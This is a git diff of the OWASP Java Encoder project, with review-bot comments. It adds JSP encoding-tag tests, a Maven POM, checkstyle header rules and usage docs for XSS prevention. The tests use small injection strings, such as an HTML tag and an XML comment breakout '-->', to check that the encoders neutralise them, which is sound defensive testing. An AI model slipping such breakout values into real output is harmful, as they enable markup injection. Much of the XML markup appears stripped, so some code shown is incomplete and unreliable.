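Review bot: The single input `"\\\""` (a backslash and a double quote) is percent-encoded the same way by a whole-URI encoder and by a URI-component encoder, so this test cannot distinguish ForUriTag from ForUriComponentTag and would still pass if the tag were wired to the wrong Encode method. Add a second value made of URI-reserved characters, which a whole-URI encoder is expected to pass through unchanged while a component encoder would percent-encode them, e.g. `instance.setValue("a/b?c=d&e");` followed by an assertion that `_response` holds the same string; confirm the exact expectation against the encoder's documented table, since the tag and the Encode methods are outside this hunk. If ForUriTag wraps a whole-URI encoder as its name suggests, the class Javadoc should also say that it encodes but does not validate the URL, so that readers do not rely on it to reject a `javascript:` scheme; a one-line note such as `* This tag percent-encodes the value; it does not validate the URL or its scheme.` would do.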
@@ -0,0 +1,77 @@ +// Copyright (c) 2012 Jeff Ichnowski +// All rights reserved. +// +// Redistribution and use in source and binary forms, with or without +// modification, are permitted provided that the following conditions +// are met: +// +// * Redistributions of source code must retain the above +// copyright notice, this list of conditions and the following +// disclaimer. +// +// * Redistributions in binary form must reproduce the above +// copyright notice, this list of conditions and the following +// disclaimer in the documentation and/or other materials +// provided with the distribution. +// +// * Neither the name of the OWASP nor the names of its +// contributors may be used to endorse or promote products +// derived from this software without specific prior written +// permission. +// +// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS +// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT +// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS +// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE +// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, +// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES +// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR +// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) +// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, +// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) +// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED +// OF THE POSSIBILITY OF SUCH DAMAGE. + + +package org.owasp.encoder.tag; + +/** + * Simple tests for the ForXmlAttributeTag. 
+ * + * @author Jeremy Long (jeremy.long@gmail.com) + */ +public class ForXmlAttributeTagTest extends EncodingTagTest { + + public ForXmlAttributeTagTest(String testName) { + super(testName); + } + + @Override + protected void setUp() throws Exception { + super.setUp(); + } + + @Override + protected void tearDown() throws Exception { + super.tearDown(); + } + + /** + * Test of doTag method, of class ForXmlAttributeTag. + * This is a very simple test that doesn't fully + * exercise/test the encoder - only that the + * tag itself works. + * @throws Exception is thrown if the tag fails. + */ + public void testDoTag() throws Exception { + System.out.println("doTag"); + ForXmlAttributeTag instance = new ForXmlAttributeTag(); + String value = "
    "; + String expected = "<div>"; + instance.setJspContext(_pageContext); + instance.setValue(value); + instance.doTag(); + String results = _response.getContentAsString(); + assertEquals(expected,results); + } +} diff --git a/jsp/src/test/java/org/owasp/encoder/tag/ForXmlCommentTagTest.java b/jsp/src/test/java/org/owasp/encoder/tag/ForXmlCommentTagTest.java new file mode 100644 index 0000000..cea3db3 --- /dev/null +++ b/jsp/src/test/java/org/owasp/encoder/tag/ForXmlCommentTagTest.java 
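Review bot: The test exercises only an element-like value (the expected string `"<div>"` as shown here would mean no encoding at all, which is presumably a rendering artifact of this view rather than the real expectation, so verify the asserted entity form against the source), but the characters that actually let a value break out of an XML attribute are the delimiters `"` and `'` and the entity introducer `&`, none of which appear in the test. Add a case such as `instance.setValue("\"'&");` with the expected string taken from Encode.forXmlAttribute's documented output for those three characters; the encoder is outside this hunk, so I am not quoting its exact entity choice here. Pinning the quote handling is what protects the tag's consumers from an attribute-injection regression, whereas the angle-bracket case only protects against element injection.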
@@ -0,0 +1,77 @@ +// Copyright (c) 2012 Jeff Ichnowski +// All rights reserved. +// +// Redistribution and use in source and binary forms, with or without +// modification, are permitted provided that the following conditions +// are met: +// +// * Redistributions of source code must retain the above +// copyright notice, this list of conditions and the following +// disclaimer. +// +// * Redistributions in binary form must reproduce the above +// copyright notice, this list of conditions and the following +// disclaimer in the documentation and/or other materials +// provided with the distribution. +// +// * Neither the name of the OWASP nor the names of its +// contributors may be used to endorse or promote products +// derived from this software without specific prior written +// permission. +// +// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS +// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT +// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS +// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE +// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, +// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES +// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR +// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) +// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, +// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) +// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED +// OF THE POSSIBILITY OF SUCH DAMAGE. + + +package org.owasp.encoder.tag; + +/** + * Simple tests for the ForXmlCommentTag. 
+ * + * @author Jeremy Long (jeremy.long@gmail.com) + */ +public class ForXmlCommentTagTest extends EncodingTagTest { + + public ForXmlCommentTagTest(String testName) { + super(testName); + } + + @Override + protected void setUp() throws Exception { + super.setUp(); + } + + @Override + protected void tearDown() throws Exception { + super.tearDown(); + } + + /** + * Test of doTag method, of class ForXmlCommentTag. + * This is a very simple test that doesn't fully + * exercise/test the encoder - only that the + * tag itself works. + * @throws Exception is thrown if the tag fails. + */ + public void testDoTag() throws Exception { + System.out.println("doTag"); + ForXmlCommentTag instance = new ForXmlCommentTag(); + String value = "--> + + + 4.0.0 + + org.owasp.encoder + encoder-parent + 1.2.3 + pom + + OWASP Java Encoder Project + + The OWASP Encoders package is a collection of high-performance low-overhead + contextual encoders, that when utilized correctly, is an effective tool in + preventing Web Application security vulnerabilities such as Cross-Site + Scripting. 
+ + + + core + jsp + esapi + + + https://www.owasp.org/index.php/OWASP_Java_Encoder_Project + 2011 + + OWASP (Open Web-Application Security Project) + https://www.owasp.org/ + + + + + The BSD 3-Clause License + http://www.opensource.org/licenses/BSD-3-Clause + repo + + + + + org.sonatype.oss + oss-parent + 9 + + + + scm:git:git@github.com:owasp/owasp-java-encoder.git + scm:git:git@github.com:owasp/owasp-java-encoder.git + https://github.com/owasp/owasp-java-encoder + + + + gh-pages + gh-pages + http://owasp.github.io/owasp-java-encoder + + + + + Owasp-java-encoder-project + https://lists.owasp.org/mailman/listinfo/owasp-java-encoder-project + https://lists.owasp.org/mailman/listinfo/owasp-java-encoder-project + owasp-java-encoder-project@lists.owasp.org + http://lists.owasp.org/pipermail/owasp-java-encoder-project/ + + + + + github + https://github.com/owasp/owasp-java-encoder/issues + + + + + Jeff Ichnowski + + Project Owner + Architect + Developer + + + + Jim Manico + OWASP + https://www.owasp.org/ + + Architect + Developer + + + + Jeremy Long + jeremy.long@owasp.org + OWASP + https://www.owasp.org/ + + developer + + + + + + UTF-8 + UTF-8 + + + + + + junit + junit + 3.8.2 + + + + + + junit + junit + test + + + + + + + org.apache.maven.plugins + maven-compiler-plugin + 3.10.1 + + + org.apache.maven.plugins + maven-jar-plugin + 3.2.2 + + + org.apache.maven.plugins + maven-source-plugin + 3.2.1 + + + org.apache.maven.plugins + maven-javadoc-plugin + 3.4.0 + + + org.jacoco + jacoco-maven-plugin + 0.8.8 + + + org.apache.maven.plugins + maven-failsafe-plugin + 2.19.1 + + + org.apache.maven.plugins + maven-surefire-plugin + 2.19.1 + + + org.apache.maven.plugins + maven-surefire-report-plugin + 2.19.1 + + + org.apache.maven.plugins + maven-gpg-plugin + 1.6 + + + org.apache.maven.plugins + maven-site-plugin + + 3.4 + + + lt.velykis.maven.skins + reflow-velocity-tools + 1.1.1 + + + + org.apache.velocity + velocity + 1.7 + + + org.apache.maven.doxia + doxia-module-markdown 
+ 1.6 + + + + + org.apache.maven.plugins + maven-project-info-reports-plugin + 2.9 + + + org.apache.maven.plugins + maven-pmd-plugin + 3.6 + + + org.apache.felix + maven-bundle-plugin + 3.3.0 + + + org.codehaus.mojo + versions-maven-plugin + 2.3 + + + org.apache.maven.plugins + maven-jxr-plugin + 2.5 + + + org.codehaus.mojo + findbugs-maven-plugin + 3.0.4 + + + + + + + org.apache.maven.plugins + maven-compiler-plugin + + 1.6 + 1.6 + + + + org.apache.felix + maven-bundle-plugin + + + default-bundle + process-classes + + manifest + + + true + + <_noee>true + <_nouses>true + ${jigsaw.module.name} + + + + + + + org.jacoco + jacoco-maven-plugin + + + prepare-agent + + prepare-agent + + + surefireArgLine + + + + + + org.apache.maven.plugins + maven-surefire-plugin + + + org/owasp/encoder/BenchmarkTest.java + + ${surefireArgLine} + + + + org.apache.maven.plugins + maven-jar-plugin + + + default-jar + package + + jar + + + + + + org.apache.maven.plugins + maven-source-plugin + + + attach-sources + package + + jar + + + + + + org.apache.maven.plugins + maven-javadoc-plugin + + + attach-javadocs + package + + jar + + + 1.6 + false + + + + + + org.apache.maven.plugins + maven-site-plugin + + + + + + + org.apache.maven.plugins + maven-project-info-reports-plugin + + + + index + summary + license + scm + mailing-list + issue-tracking + dependencies + plugin-management + project-team + + + + + + org.codehaus.mojo + versions-maven-plugin + + + + dependency-updates-report + plugin-updates-report + + + + + + org.apache.maven.plugins + maven-jxr-plugin + + + org.apache.maven.plugins + maven-surefire-report-plugin + + + + report-only + failsafe-report-only + + + + + + org.jacoco + jacoco-maven-plugin + + + + + report + + + + + + org.apache.maven.plugins + maven-pmd-plugin + + 1.5 + true + utf-8 + + + + org.apache.maven.plugins + maven-javadoc-plugin + + + default + + javadoc + + + 1.6 + false + + + + + + org.apache.maven.plugins + maven-checkstyle-plugin + + 
src/main/config/checkstyle.xml + src/main/config/checkstyle-header.txt + + + + org.codehaus.mojo + findbugs-maven-plugin + + + + + + sign-artifacts + + + performRelease + true + + + + + + org.apache.maven.plugins + maven-gpg-plugin + + + sign-artifacts + verify + + sign + + + + + + + + + diff --git a/src/main/config/checkstyle-header.txt b/src/main/config/checkstyle-header.txt new file mode 100644 index 0000000..3b51065 --- /dev/null +++ b/src/main/config/checkstyle-header.txt 
@@ -0,0 +1,33 @@
+^// Copyright \(c\) 201[2-9] (Jeff Ichnowski|Jim Manico|Jeremy Long)\s*$
+^// All rights reserved\.\s*$
+^//
+^// Redistribution and use in source and binary forms, with or without\s*$
+^// modification, are permitted provided that the following conditions\s*$
+^// are met:\s*$
+^//\s*$
+^// \* Redistributions of source code must retain the above\s*$
+^// copyright notice, this list of conditions and the following\s*$
+^// disclaimer\.\s*$
+^//
+^// \* Redistributions in binary form must reproduce the above\s*$
+^// copyright notice, this list of conditions and the following\s*$
+^// disclaimer in the documentation and/or other materials\s*$
+^// provided with the distribution.\s*$
+^//
+^// \* Neither the name of the OWASP nor the names of its\s*$
+^// contributors may be used to endorse or promote products\s*$
+^// derived from this software without specific prior written\s*$
+^// permission\.\s*$
+^//
+^// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS\s*$
+^// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT\s*$
+^// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS\s*$
+^// FOR A PARTICULAR PURPOSE ARE DISCLAIMED\. IN NO EVENT SHALL THE\s*$
+^// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,\s*$
+^// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES\s*$
+^// \(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR\s*$
+^// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION\)\s*$
+^// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,\s*$
+^// STRICT LIABILITY, OR TORT \(INCLUDING NEGLIGENCE OR OTHERWISE\)\s*$
+^// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED\s*$
+^// OF THE POSSIBILITY OF SUCH DAMAGE\.\s*$
diff --git a/src/main/config/checkstyle.xml b/src/main/config/checkstyle.xml
new file mode 100644
index 0000000..3f2c8b6
--- /dev/null
+++ b/src/main/config/checkstyle.xml
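Review bot: The first header pattern, `^// Copyright \(c\) 201[2-9] (Jeff Ichnowski|Jim Manico|Jeremy Long)\s*$`, rejects any copyright year of 2020 or later, so every source file added after 2019 will fail the checkstyle header check, and the usual outcome is that the check gets disabled rather than the template fixed. Widen the year, e.g. `^// Copyright \(c\) 20[12][0-9] (Jeff Ichnowski|Jim Manico|Jeremy Long)\s*$`. The four bare `^//` lines (after "All rights reserved", "disclaimer\.", "provided with the distribution." and "permission\.") lack the `\s*$` anchor, and the unescaped dot in `provided with the distribution.\s*$` matches any character, so those lines accept text other than the license wording; anchoring them as `^//\s*$` and escaping the dot makes the template match the license exactly like its neighbours do.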
@@ -0,0 +1,204 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + diff --git a/src/site/markdown/index.md b/src/site/markdown/index.md new file mode 100644 index 0000000..0273e4f --- /dev/null +++ b/src/site/markdown/index.md @@ -0,0 +1,56 @@ +## OWASP Java Encoder Project + +The OWASP Java Encoder Project is a collection of high-performance low-overhead +contextual encoders, that when utilized correctly, is an effective tool in +preventing Web Application security vulnerabilities such as Cross-Site +Scripting (XSS). + +Please see the [OWASP XSS Prevention Cheat Sheet](https://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet) +for more information on preventing XSS. + +### Usage + +In addition to the usage guidance below, more examples can be found on the [OWASP Java Encoder Project Wiki](https://www.owasp.org/index.php/OWASP_Java_Encoder_Project#tab=Use_the_Java_Encoder_Project). + +The JARs can be found in [Maven Central](https://search.maven.org/#search%7Cga%7C1%7Cg%3A%22org.owasp.encoder%22). + +```xml + + org.owasp.encoder + encoder + 1.2.3 + +``` + +Utilize the encoder: + +```java +import org.owasp.encoder.Encode; + +//... + +PrintWriter out = ....; +out.println(""); +``` + +### JSP Usage + +The JSP Encoder makes the use of the Java Encoder within JSP simple via a TLD that +includes tags and a set of JSP EL functions: + +```xml + + org.owasp.encoder + encoder-jsp + 1.2.3 + +``` + +```JSP +<%@taglib prefix="e" uri="https://www.owasp.org/index.php/OWASP_Java_Encoder_Project" %> + +<%-- ... --%> + +

    Dynamic data via EL: ${e:forHtml(param.value)}

    +

    Dynamic data via tag:

    +``` diff --git a/src/site/resources/images/owasp.jpg b/src/site/resources/images/owasp.jpg new file mode 100644 index 0000000..addae89 Binary files /dev/null and b/src/site/resources/images/owasp.jpg differ diff --git a/src/site/site.xml b/src/site/site.xml new file mode 100644 index 0000000..f1d4a83 --- /dev/null +++ b/src/site/site.xml @@ -0,0 +1,92 @@ + + + + + lt.velykis.maven.skins + reflow-maven-skin + 1.1.1 + + + + + OWASP Java Encoder Project + OWASP Java Encoder Project + OWASP Java Encoder Project + ./images/owasp.jpg + 107 + 300 + + + + default + true + github + + ${project.name} + https://www.owasp.org/index.php/OWASP_Java_Encoder_Project + + false + top + 6 + Modules|Maven Documentation + + Modules + Contribute + Maven Documentation + + + + + + + + + + + + + + + + + + + + + + -- cgit v1.2.3